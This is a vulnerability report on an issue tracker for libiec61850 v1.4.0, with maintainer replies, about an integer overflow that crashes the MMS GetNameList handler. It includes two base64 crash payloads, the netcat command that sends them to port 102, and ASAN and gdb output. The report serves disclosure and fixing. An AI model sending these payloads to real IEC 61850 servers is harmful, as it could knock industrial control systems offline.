SegmentFault in mmsServer_handleGetNameListRequest in src/mms/iso_mms/server/mms_get_namelist_service.c

[Alice-and-Bob]

Description

An integer overflow vulnerability was detected in the mMSserver_handleGetNamelist_service.c function of src/mms/iso_mms/server/mms_get_namelist_service.c. The vulnerability manifests as SEGV and causes the application to crash

version

v1.4.0 and earlier release

system information

ubuntu18.04

proof of concept

poc

root@VirtualBox:/iec61850-poc/mms_get_namelist_service# base64 poc1 AwAAQQLwgAEAAQBhNDAyAgEAoC2gKwIBGqEmoAOAAQChDYGLVEVNUExBVH////+CEExMTjAkQ0Yk U3RyVmFsMjA=

root@VirtualBox:/iec61850-poc/mms_get_namelist_service# base64 poc2 AwAAPgLwgAEAAQBhMTAvAgEAoCqgKAIBbK0jgCEBoR6AHDAaoBihFhoLVEVURQLw gAEAAQBhMTAv AgEAoCqgKAIBbK0jgCEBTEQwAgFs3H/+/qEToAIARU1BVEVMRA==

poc_of_mms_get_namelist_service.zip

command

cd path/to/libiec61850-v1.4.0/examples/server_example_substitution
sudo ./server_example_substitution

cat poc | nc 0.0.0.0 102

result

Using libIEC61850 version 1.4.0
Connection opened
ASAN:DEADLYSIGNAL
=================================================================
==15239==ERROR: AddressSanitizer: SEGV on unknown address 0x630f80014827 (pc 0x5636eef01b4f bp 0x7efea42fc810 sp 0x7efea42fc570 T3)
==15239==The signal is caused by a READ memory access.
    #0 0x5636eef01b4e in mmsServer_handleGetNameListRequest src/mms/iso_mms/server/mms_get_namelist_service.c:446
    #1 0x5636eee4acfa in handleConfirmedRequestPdu src/mms/iso_mms/server/mms_server_connection.c:317
    #2 0x5636eee4c6b4 in MmsServerConnection_parseMessage src/mms/iso_mms/server/mms_server_connection.c:655
    #3 0x5636eee4c838 in messageReceived src/mms/iso_mms/server/mms_server_connection.c:696
    #4 0x5636eeea0319 in IsoConnection_handleTcpConnection src/mms/iso_server/iso_connection.c:307
    #5 0x5636eeea0faa in handleTcpConnection src/mms/iso_server/iso_connection.c:442
    #6 0x5636eee38d99 in destroyAutomaticThread hal/thread/linux/thread_linux.c:90
    #7 0x7efea8b0d6da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)
    #8 0x7efea849861e in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x12161e)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/mms/iso_mms/server/mms_get_namelist_service.c:446 in mmsServer_handleGetNameListRequest
Thread T3 created by T1 here:
    #0 0x7efea8d5cd2f in __interceptor_pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x37d2f)
    #1 0x5636eee38e24 in Thread_start hal/thread/linux/thread_linux.c:101
    #2 0x5636eeea16bb in IsoConnection_start src/mms/iso_server/iso_connection.c:532
    #3 0x5636eee9df3e in handleIsoConnections src/mms/iso_server/iso_server.c:414
    #4 0x5636eee9e135 in isoServerThread src/mms/iso_server/iso_server.c:493
    #5 0x7efea8b0d6da in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x76da)

Thread T1 created by T0 here:
    #0 0x7efea8d5cd2f in __interceptor_pthread_create (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x37d2f)
    #1 0x5636eee38ec8 in Thread_start hal/thread/linux/thread_linux.c:105
    #2 0x5636eee9e708 in IsoServer_startListening src/mms/iso_server/iso_server.c:611
    #3 0x5636eee42149 in MmsServer_startListening src/mms/iso_mms/server/mms_server.c:458
    #4 0x5636eee35730 in IedServer_start src/iec61850/server/impl/ied_server.c:612
    #5 0x5636eee2036e in main /home/yang/iec61850/libiec61850-1.4.0-asan/examples/server_example_substitution/server_example_substitution.c:188
    #6 0x7efea8398c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)

==15239==ABORTING

gdb

GNU gdb (Ubuntu 8.1.1-0ubuntu1) 8.1.1
Copyright (C) 2018 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./libiec61850-1.4.0/examples/server_example_substitution/server_example_substitution...done.
(gdb) run
Starting program: /home/yang/iec61850/libiec61850-1.4.0/examples/server_example_substitution/server_example_substitution 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Using libIEC61850 version 1.4.0
[New Thread 0x7ffff7424700 (LWP 19188)]
[New Thread 0x7ffff6c23700 (LWP 19189)]
Connection opened
[New Thread 0x7ffff6422700 (LWP 21331)]

Thread 4 "server_example_" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7ffff6422700 (LWP 21331)]
0x00005555555b258d in mmsServer_handleGetNameListRequest (connection=0x7ffff0024ae0, buffer=0x7ffff0000c2d "\240+\002\001\032\241&\240\003\200\001", bufPos=-2147483621, maxBufPos=45, invokeId=26, 
    response=0x7ffff6421e00) at src/mms/iso_mms/server/mms_get_namelist_service.c:446
warning: Source file is more recent than executable.
446	        uint8_t tag = buffer[bufPos++];
(gdb) print bufPos
$1 = -2147483621
(gdb) 

[Alice-and-Bob]

hi，@mzillgith and teams. If you handle the error as soon as possible, I will provide all possible information

[mzillgith]

Hi,
Thank you. However you are using a very old version of the library. Seems the problem is already fixed in the current versions of the library.
But applying your poc2 seems to trigger another issue that should be fixed with commit cf94d64

[Alice-and-Bob]

Hi, Thank you. However you are using a very old version of the library. Seems the problem is already fixed in the current versions of the library. But applying your poc2 seems to trigger another issue that should be fixed with commit cf94d64

Yes, I found the bug fixed by the cf94d64 branch using poc2 before your. It is possible that I am mistaken about the poc and the vulnerability it corresponds to. However, this poc can cause SEGV errors in all versions before the fix is committed. I will address this in more detail in a separate issue.